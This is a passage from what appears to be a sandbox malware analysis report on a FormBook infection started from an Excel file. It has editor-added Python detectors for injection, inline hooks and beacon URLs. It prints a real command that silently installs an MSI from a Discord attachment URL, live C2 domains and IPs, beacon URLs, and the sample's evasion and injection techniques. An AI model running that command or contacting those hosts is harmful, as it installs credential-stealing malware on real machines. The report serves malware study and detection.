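            findings.append(("wininit-with-non-smss-parent", e.image))
        m = re.search(r"\bdel\s+['\"]?([^'\"]+)", norm, re.IGNORECASE)
        if child == "cmd.exe" and m and m.group(1).strip().lower() in known:
            findings.append(("deletes-executed-image", e.image))
    return findings


if __name__ == "__main__":
    for rule, image in evaluate(parse_process_events(PROCESS_LINES)):
        print(f"{rule:32} {image}")
```

The msiexec rule fires twice on purpose, once on the cmd.exe line whose normalised command line already names msiexec with a URL and once on the msiexec.exe child, so the detection does not depend on which of the two events a telemetry source happens to deliver.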
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008FDFA1 push ecx; ret 7_2_008FDFB4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021FDFA1 push ecx; ret 9_2_021FDFB4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00096608 push esp; iretd 9_2_00096609
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_000998E6 pushad ; ret 9_2_000998EA
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00097AA0 push 00FCAB15h; ret 9_2_00097AA6
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0009CEA5 push eax; ret 9_2_0009CEF8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0009CEFB push eax; ret 9_2_0009CF62
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0009CEF2 push eax; ret 9_2_0009CEF8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_0009CF5C push eax; ret 9_2_0009CF62
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_00096FE8 push ss; retf 9_2_00096FE9
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_024EE3E6 pushad ; ret 9_2_024EE3E7

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Installer\MSID8B1.tmp File created: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dll

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE7
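The line above records that the first bytes of USER32!PeekMessageA inside explorer.exe no longer match the module's own code, which is how an inline hook (a detour written over a function prolog) appears to a memory scanner. The Python below is an added example written by the editor, not sandbox code: it parses such a line, compares the live bytes with a reference copy of the prolog, and classifies the overwrite by its leading bytes. The reference prolog is a constructed stand-in, not the real PeekMessageA bytes, and the six bytes the report gives do not form one of the common trampoline shapes, so the example classifies them as an unrecognised modification rather than guessing what they do. A production check would read the reference bytes from the on-disk module and apply relocations before comparing.

```python
import re
import struct
from typing import NamedTuple, Optional, Tuple


class PrologCheck(NamedTuple):
    hooked: bool
    kind: str                  # clean | jmp-rel32 | jmp-indirect | push-ret | int3 | unrecognised-modification
    first_diff: Optional[int]  # offset of the first byte that differs
    target: Optional[int]      # detour destination when it can be computed


# The report's evidence line, parsed below into (module, function, bytes).
REPORT_LINE = ("Source: explorer.exe User mode code has changed: module: USER32.dll "
               "function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE7")

# Constructed reference prolog (mov [rsp+8],rbx; push rdi; sub rsp,20h). It is an
# assumption standing in for bytes read from the on-disk USER32.dll and is NOT
# the real PeekMessageA prolog.
CLEAN_PROLOG = bytes.fromhex("48895c2408574883ec20")

_HOOK_LINE = re.compile(
    r"module:\s+(?P<module>\S+)\s+function:\s+(?P<func>\S+)\s+new code:\s+"
    r"(?P<bytes>(?:0x[0-9A-Fa-f]{2}\s*)+)"
)


def parse_hook_line(line: str) -> Tuple[str, str, bytes]:
    """Extract module, function and the observed prolog bytes from a report line."""
    m = _HOOK_LINE.search(line)
    if not m:
        raise ValueError("not a 'User mode code has changed' line")
    data = bytes(int(tok, 16) for tok in m.group("bytes").split())
    return m.group("module"), m.group("func"), data


def check_prolog(expected: bytes, observed: bytes, address: int) -> PrologCheck:
    """Compare the live prolog with the reference; classify the detour if it differs."""
    n = min(len(expected), len(observed))
    diff = next((i for i in range(n) if expected[i] != observed[i]), None)
    if diff is None:
        return PrologCheck(False, "clean", None, None)
    o = observed
    if len(o) >= 5 and o[0] == 0xE9:                     # jmp rel32, target relative to next insn
        rel = struct.unpack("<i", o[1:5])[0]
        return PrologCheck(True, "jmp-rel32", diff, address + 5 + rel)
    if len(o) >= 6 and o[0] == 0xFF and o[1] == 0x25:    # jmp [rip+disp32] / jmp [abs32]
        return PrologCheck(True, "jmp-indirect", diff, None)
    if len(o) >= 6 and o[0] == 0x68 and o[5] == 0xC3:    # push imm32; ret
        return PrologCheck(True, "push-ret", diff, struct.unpack("<I", o[1:5])[0])
    if o[0] == 0xCC:                                     # int3 breakpoint
        return PrologCheck(True, "int3", diff, None)
    return PrologCheck(True, "unrecognised-modification", diff, None)


if __name__ == "__main__":
    module, func, live = parse_hook_line(REPORT_LINE)
    print(module, func, check_prolog(CLEAN_PROLOG, live, 0x7FF800001000))
```

Only the overlapping prefix is compared, since the sandbox reports just the bytes that changed; a scanner that reads the full function can pass longer buffers unchanged.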
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Installer\MSID8B1.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wininit.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Installer\MSID8B1.tmp RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Installer\MSID8B1.tmp RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wininit.exe RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wininit.exe RDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00940101 rdtsc 7_2_00940101
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\msiexec.exe TID: 2944 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2336 Thread sleep time: -54000s >= -30000s
Source: C:\Windows\SysWOW64\wininit.exe TID: 2264 Thread sleep time: -70000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: explorer.exe, 00000008.00000002.2343968360.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2111770353.000000000842E000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000000.2106036941.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000008.00000000.2111770353.000000000842E000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: MSID8B1.tmp, 00000006.00000002.2096256432.0000000000534000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000008.00000002.2344004696.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Windows\Installer\MSID8B1.tmp Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\Installer\MSID8B1.tmp Process queried: DebugPort
Source: C:\Windows\SysWOW64\wininit.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_00940101 rdtsc 7_2_00940101
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F00C4 NtCreateFile,LdrInitializeThunk, 7_2_008F00C4
Contains functionality to read the PEB
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 6_2_10001000 mov eax, dword ptr fs:[00000030h] 6_2_10001000
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 6_2_005015DB mov eax, dword ptr fs:[00000030h] 6_2_005015DB
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 6_2_005017F3 mov eax, dword ptr fs:[00000030h] 6_2_005017F3
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_009026F8 mov eax, dword ptr fs:[00000030h] 7_2_009026F8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_022026F8 mov eax, dword ptr fs:[00000030h] 9_2_022026F8
Enables debug privileges
Source: C:\Windows\Installer\MSID8B1.tmp Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wininit.exe Process token adjusted: Debug
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 6_2_1000144A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_1000144A

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.duoteshop.com
Source: C:\Windows\explorer.exe Domain query: www.destek-taleplerimiz.com
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80
Source: C:\Windows\explorer.exe Domain query: www.adimadimingilizce.com
Source: C:\Windows\explorer.exe Network Connect: 99.83.154.118 80
DLL side loading technique detected
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dll (reported three times)
Maps a DLL or memory area into another process
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: unknown target: C:\Windows\Installer\MSID8B1.tmp protection: execute and read and write
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write (reported twice)
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write (reported twice)
Source: C:\Windows\SysWOW64\wininit.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wininit.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Installer\MSID8B1.tmp Thread register set: target process: 1388 (reported twice)
Source: C:\Windows\SysWOW64\wininit.exe Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Windows\Installer\MSID8B1.tmp Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Windows\Installer\MSID8B1.tmp Section unmapped: C:\Windows\SysWOW64\wininit.exe base address: 1D0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
Source: C:\Windows\Installer\MSID8B1.tmp Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp
Source: C:\Windows\Installer\MSID8B1.tmp Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
Source: C:\Windows\SysWOW64\wininit.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp'
Source: explorer.exe, 00000008.00000002.2344162820.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000002.2344162820.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.2343968360.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.2344162820.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: C:\Windows\System32\msiexec.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
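The HIPS section above records the raw events of the injection chain (a process created in suspended mode, its image unmapped, sections mapped in with execute-read-write protection, a thread context rewritten, an APC queued into explorer.exe) and then a Windows system binary resolving the C2 domains and opening connections. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses behaviour lines in the report's own "Source: <process> <event>: <detail>" format, groups cross-process events per (injector, target), names the technique each combination implies, and lists network activity attributed to a system binary. The sample lines are copied from this section with the interactive link text removed; "Thread register set" only reports a PID (1388) that the report never maps to an image, so it is kept as an opaque target. The technique labels and the SYSTEM_PROCESSES allow-list are assumptions of this example.

```python
"""Added example (not from the Joe Sandbox report): reconstruct the injection
chain and system-process network activity from behaviour lines."""
import re
from collections import defaultdict

# Constructed input: lines copied from the HIPS section of this report, with
# the interactive "Jump to behavior" link text removed.
BEHAVIOR_LINES = r"""
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dll
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Installer\MSID8B1.tmp Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wininit.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\Installer\MSID8B1.tmp Thread register set: target process: 1388
Source: C:\Windows\Installer\MSID8B1.tmp Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Installer\MSID8B1.tmp Section unmapped: C:\Windows\SysWOW64\wininit.exe base address: 1D0000
Source: C:\Windows\Installer\MSID8B1.tmp Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
Source: C:\Windows\SysWOW64\wininit.exe Thread register set: target process: 1388
Source: C:\Windows\explorer.exe Domain query: www.duoteshop.com
Source: C:\Windows\explorer.exe Domain query: www.destek-taleplerimiz.com
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80
Source: C:\Windows\explorer.exe Domain query: www.adimadimingilizce.com
Source: C:\Windows\explorer.exe Network Connect: 99.83.154.118 80
"""

EVENT_RE = re.compile(
    r"^Source: (?P<src>\S+) "
    r"(?P<event>Process created|Section loaded|Section unmapped|"
    r"Thread register set|Thread APC queued|Network Connect|Domain query): "
    r"(?P<rest>.*)$"
)
TARGET_RE = re.compile(r"target(?: process)?: (\S+)")
PROT_RE = re.compile(r"protection: (.+)$")

# Assumption: a short allow-list of Windows binaries that should never open
# sockets on their own; extend it for real hunting.
SYSTEM_PROCESSES = {
    r"c:\windows\explorer.exe",
    r"c:\windows\syswow64\wininit.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}


def parse(text):
    """Turn report lines into event dicts with a lower-cased source and target."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        event, rest = m.group("event"), m.group("rest")
        ev = {"src": m.group("src").lower(), "event": event, "rest": rest}
        if event in ("Process created", "Section unmapped"):
            ev["target"] = rest.split()[0].lower()       # first token is the image path
        elif event in ("Section loaded", "Thread APC queued", "Thread register set"):
            t = TARGET_RE.search(rest)
            ev["target"] = t.group(1).lower() if t else None  # DLL side-load lines have no target
        if event == "Section loaded":
            p = PROT_RE.search(rest)
            ev["rwx"] = bool(p) and "execute" in p.group(1)
        events.append(ev)
    return events


def injection_findings(events):
    """Collect cross-process facts per (injector, target) and name the technique."""
    evidence = defaultdict(set)
    for ev in events:
        target = ev.get("target")
        if not target or ev["event"] in ("Network Connect", "Domain query"):
            continue
        key = (ev["src"], target)
        if ev["event"] == "Process created":
            evidence[key].add("created")
        elif ev["event"] == "Section unmapped":
            evidence[key].add("unmapped")
        elif ev["event"] == "Section loaded" and ev["rwx"]:
            evidence[key].add("rwx_section")
        elif ev["event"] == "Thread APC queued":
            evidence[key].add("apc")
        elif ev["event"] == "Thread register set":
            evidence[key].add("thread_context")
    findings = {}
    for key, facts in evidence.items():
        techniques = set()
        if {"created", "unmapped"} <= facts:   # spawn, then unmap the original image
            techniques.add("process hollowing")
        if {"apc", "rwx_section"} <= facts:    # code mapped in, then a thread forced to run it
            techniques.add("APC injection")
        if "thread_context" in facts:
            techniques.add("thread context hijack")
        if techniques:
            findings[key] = techniques
    return findings


def system_process_network(events):
    """Network activity attributed to a system binary: with the findings above,
    that traffic belongs to the injected payload, not to explorer.exe itself."""
    return [(ev["src"], ev["event"], ev["rest"]) for ev in events
            if ev["event"] in ("Network Connect", "Domain query")
            and ev["src"] in SYSTEM_PROCESSES]


if __name__ == "__main__":
    evs = parse(BEHAVIOR_LINES)
    for (injector, target), techniques in injection_findings(evs).items():
        print(f"{injector} -> {target}: {', '.join(sorted(techniques))}")
    for src, event, rest in system_process_network(evs):
        print(f"system process {src}: {event}: {rest}")
```

The same parser can be pointed at the full behaviour export of a report; the combination rules are deliberately strict (hollowing needs both the suspended spawn and the unmap of the same target), so a single RWX mapping into a process does not produce a finding by itself.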

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
Behavior Graph (ID: 402839)
Sample: 0d69e4f6_by_Libranalysis   Start date: 03/05/2021   Architecture: WINDOWS   Score: 100

Sample-level signatures:
  - Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  - Found malware configuration
  - Malicious sample detected (through community Yara rule)
  - 10 other signatures
Sample-level domains: www.111bjs.com, 111bjs.com, cdn.discordapp.com

Process tree:
  MSID8B1.tmp
    dropped: C:\Users\user\AppData\Local\Temp\...\5rov.dll (PE32)
    signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; DLL side loading technique detected; Tries to detect virtualization through RDTSC time measurements
    started MSID8B1.tmp
      signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      started wininit.exe
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        started cmd.exe
      injected explorer.exe
        signatures: System process connects to network (likely due to code injection or exploit)
        network: adimadimingilizce.com 192.0.78.25, ports 49166 -> 80, AUTOMATTICUS, United States
                 www.destek-taleplerimiz.com 99.83.154.118, ports 49167 -> 80, AMAZON-02US, United States
                 2 other IPs or domains
  EXCEL.EXE
    signatures: Obfuscated command line found
    started cmd.exe
      started msiexec.exe

Contacted Public IPs

IP             Domain                        Country        ASN    ASN Name      Malicious
192.0.78.25    adimadimingilizce.com         United States  2635   AUTOMATTICUS  true
99.83.154.118  www.destek-taleplerimiz.com   United States  16509  AMAZON-02US   true

Contacted Domains

Name IP Active
adimadimingilizce.com 192.0.78.25 true
cdn.discordapp.com 162.159.129.233 true
www.destek-taleplerimiz.com 99.83.154.118 true
111bjs.com 34.102.136.180 true
www.adimadimingilizce.com unknown unknown
www.duoteshop.com unknown unknown
www.111bjs.com unknown unknown

Contacted URLs

Name / Malicious / Antivirus Detection / Reputation

www.111bjs.com/ccr/
  Malicious: true   Antivirus Detection: Avira URL Cloud: malware   Reputation: low
http://www.adimadimingilizce.com/ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn
  Malicious: true   Antivirus Detection: Avira URL Cloud: safe   Reputation: unknown
http://www.destek-taleplerimiz.com/ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn
  Malicious: true   Antivirus Detection: Avira URL Cloud: safe   Reputation: unknown

The "Antivirus Detection" column is the Avira URL Cloud reputation lookup at analysis time; a "safe" rating there does not override the Malicious verdict, which comes from the URL being requested by the injected explorer.exe process.
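Two of the three URLs above are rated "safe" by URL reputation yet flagged malicious, because what identifies them is their shape rather than their host: the same /ccr/ path, the same two query parameters, a long base64-looking blob in the first and a short constant (pHE=kv2pMLCxOn) in the second. The Python below is an added example, not part of the Joe Sandbox report: it normalises the URLs from the table (plus the discordapp.com MSI download from the msiexec command line as a negative case), extracts that beacon shape, clusters hosts that share it, and lists every host seen with the /ccr/ path so the query-less www.111bjs.com entry is not lost. It avoids urllib's parse_qs on purpose, because that decodes the + inside the base64 blob to a space. The regexes describing the shape are assumptions drawn from these two URLs only, not a general FormBook signature.

```python
"""Added example (not from the Joe Sandbox report): cluster contacted URLs by
beacon shape instead of trusting per-host reputation."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: the three Contacted URLs entries plus the MSI download
# URL from the msiexec command line, which serves as a non-beacon control.
URLS = [
    "www.111bjs.com/ccr/",
    "http://www.adimadimingilizce.com/ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn",
    "http://www.destek-taleplerimiz.com/ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn",
    "https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi",
]

# Assumed shape, taken from the two beacon URLs above: a long base64-looking
# value carrying the encrypted data, then a short alphanumeric constant.
DATA_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
TAG_RE = re.compile(r"[A-Za-z0-9]{6,16}")


def normalise(url):
    """Prefix scheme-less entries (the report prints some) so urlsplit sees a host."""
    return url if "://" in url else "http://" + url


def split_query(query):
    """Split the query string by hand: parse_qs would turn the '+' inside the
    base64 blob ('Id+Xy' in the second URL) into a space and break matching."""
    pairs = []
    for kv in filter(None, query.split("&")):
        key, _, value = kv.partition("=")
        pairs.append((key, value))
    return pairs


def beacon_shape(url):
    """Return host, path and parameter layout, or None if the URL does not
    have the two-parameter beacon shape."""
    parts = urlsplit(normalise(url))
    params = split_query(parts.query)
    if len(params) != 2:
        return None
    (data_key, data_val), (tag_key, tag_val) = params
    if not (DATA_RE.fullmatch(data_val) and TAG_RE.fullmatch(tag_val)):
        return None
    return {"host": parts.hostname, "path": parts.path,
            "data_param": data_key, "tag": f"{tag_key}={tag_val}"}


def cluster(urls):
    """Group hosts by (path, data parameter name, constant tag): hosts in one
    group are used by the same build, whatever their reputation says."""
    groups = defaultdict(list)
    for url in urls:
        shape = beacon_shape(url)
        if shape:
            groups[(shape["path"], shape["data_param"], shape["tag"])].append(shape["host"])
    return dict(groups)


def hosts_sharing_path(urls, path):
    """Pivot on the path alone, which also catches entries logged without a query."""
    return sorted({urlsplit(normalise(u)).hostname for u in urls
                   if urlsplit(normalise(u)).path == path})


if __name__ == "__main__":
    for key, hosts in cluster(URLS).items():
        print("beacon shape", key, "->", hosts)
    print("hosts with /ccr/:", hosts_sharing_path(URLS, "/ccr/"))
```

The constant tag and the path are the stable parts of the beacon, so they are the pieces worth turning into a network rule; the first parameter changes on every request and is useless as a literal match.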